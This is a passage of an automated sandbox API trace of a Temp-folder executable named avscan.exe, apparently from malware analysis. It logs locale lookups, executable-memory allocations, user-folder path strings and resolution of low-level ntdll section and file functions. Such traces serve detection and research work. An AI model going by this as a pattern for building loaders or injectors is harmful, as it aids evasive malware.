returned 20 [0149.396] GetThreadLocale () returned 0x409 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0149.452] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x3760000 [0149.456] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x3760590 [0149.456] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x3770598 [0149.456] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37805a0 [0149.457] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37905a8 [0149.457] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37a05b0 [0149.457] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37b05b8 [0149.457] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37c05c0 [0149.457] RtlAllocateHeap (HeapHandle=0x3760000, Flags=0x0, Size=0x10000) returned 0x37d05c8 [0149.467] VirtualAlloc (lpAddress=0xdf4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0xdf4000 [0149.468] VirtualAlloc (lpAddress=0xdfc000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x40) returned 0xdfc000 [0149.474] VirtualAlloc (lpAddress=0xe1c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe1c000 [0149.475] VirtualAlloc (lpAddress=0xe20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x40) returned 0xe20000 [0149.483] VirtualAlloc (lpAddress=0xe50000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe50000 [0149.484] VirtualAlloc (lpAddress=0xe54000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0xe54000 [0149.485] VirtualAlloc (lpAddress=0xe5c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe5c000 [0149.486] VirtualAlloc (lpAddress=0xe60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe60000 [0149.487] VirtualAlloc (lpAddress=0xe64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0149.487] VirtualAlloc (lpAddress=0xe68000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe68000 [0149.488] VirtualAlloc (lpAddress=0xe6c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe6c000 [0149.489] VirtualAlloc (lpAddress=0xe70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe70000 [0149.489] VirtualAlloc (lpAddress=0xe74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe74000 [0149.490] VirtualAlloc (lpAddress=0xe78000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe78000 [0149.556] GetKeyboardType (nTypeFlag=0) returned 4 [0149.567] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0149.567] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0149.567] GetVersion () returned 0x1db10106 [0149.567] GetVersion () returned 0x1db10106 [0149.568] GetCurrentThreadId () returned 0xba4 [0149.630] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0149.630] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0149.630] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.630] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.631] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.631] lstrcpynA (in: lpString1=0x28f863, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=261 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0149.631] GetThreadLocale () returned 0x409 [0149.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0149.631] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0149.631] lstrcpynA (in: lpString1=0x28f88f, lpString2="ENU", iMaxLength=217 | out: lpString1="ENU") returned="ENU" [0149.631] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0149.631] lstrcpynA (in: lpString1=0x28f88f, lpString2="EN", iMaxLength=217 | out: lpString1="EN") returned="EN" [0149.631] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0149.632] LoadStringA (in: hInstance=0x42d000, uID=0xffc2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0149.698] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1088d58 [0149.700] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ad0000 [0149.700] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1089d58 [0149.700] VirtualAlloc (lpAddress=0x2ad0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0149.701] LoadStringA (in: hInstance=0x42d000, uID=0xffc1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0149.701] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0149.701] LoadStringA (in: hInstance=0x42d000, uID=0xffc0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0149.701] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffdb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0149.702] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0149.703] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0149.722] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0149.722] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0149.722] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fe68, dwMinorVersion=0x656, dwBuildNumber=0x0, dwPlatformId=0x57935a, szCSDVersion="\x8f\x80W") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0149.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0149.793] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0149.793] GetThreadLocale () returned 0x409 [0149.811] GetThreadLocale () returned 0x409 [0149.811] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0149.811] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0149.811] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0149.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0149.813] GetThreadLocale () returned 0x409 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0149.813] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0149.885] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0149.886] GetThreadLocale () returned 0x409 [0149.886] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0149.886] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0149.886] GetThreadLocale () returned 0x409 [0149.886] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0149.886] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.888] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0149.888] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0149.889] GetProcAddress (hModule=0x775d0000, lpProcName="VariantChangeTypeEx") returned 0x775d4c28 [0149.889] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0149.889] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0149.889] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0149.889] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0149.890] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarI4FromStr") returned 0x775e6fab [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromStr") returned 0x775f01a0 [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarR8FromStr") returned 0x775e699e [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromStr") returned 0x775f6ba7 [0149.891] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyFromStr") returned 0x77616c12 [0149.892] GetProcAddress (hModule=0x775d0000, lpProcName="VarBoolFromStr") returned 0x775edbd1 [0149.892] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromCy") returned 0x775f7fdc [0149.892] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromDate") returned 0x775e7a2a [0149.892] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromBool") returned 0x775f0355 [0150.004] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0150.004] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0150.004] GetProcAddress (hModule=0x76c60000, lpProcName="CoInitializeEx") returned 0x76ca09ad [0150.004] GetProcAddress (hModule=0x76c60000, lpProcName="CoAddRefServerProcess") returned 0x76cc3cf3 [0150.004] GetProcAddress (hModule=0x76c60000, lpProcName="CoReleaseServerProcess") returned 0x76cc4314 [0150.005] GetProcAddress (hModule=0x76c60000, lpProcName="CoResumeClassObjects") returned 0x76c6ea02 [0150.005] GetProcAddress (hModule=0x76c60000, lpProcName="CoSuspendClassObjects") returned 0x76ccbb02 [0150.317] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb4 [0150.317] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0150.317] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0150.473] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3063130140047) returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b634*=0x0, psz="%UserProfile FOLDER%", len=0x14 | out: pbstr=0x54b634*="%UserProfile FOLDER%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b630*=0x0, psz="%SYSTEM DRIVE%", len=0xe | out: pbstr=0x54b630*="%SYSTEM DRIVE%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b62c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x54b62c*="%Local, ApplicationData FOLDER%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b628*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x54b628*="%AllUsers, ApplicationData FOLDER%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b624*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x54b624*="%Temp FOLDER%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b620*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x54b620*="%ApplicationData FOLDER%") returned 1 [0150.486] SysReAllocStringLen (in: pbstr=0x54b61c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x54b61c*="%InternetCache FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b618*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x54b618*="%Cookies FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b614*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x54b614*="%History FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b610*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x54b610*="%My Pictures FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b60c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x54b60c*="%AllUsers, Documents FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b608*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x54b608*="%Program Files, Common FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b604*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x54b604*="%Program Files FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b600*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x54b600*="%My Documents FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b5fc*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x54b5fc*="%WINDOWS FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b5f8*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x54b5f8*="%SYSTEM FOLDER%") returned 1 [0150.487] SysReAllocStringLen (in: pbstr=0x54b5f4*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x54b5f4*="%DEFAULT FOLDER%") returned 1 [0150.552] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.552] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0150.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0150.552] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0150.552] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0150.553] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0150.553] GetProcAddress 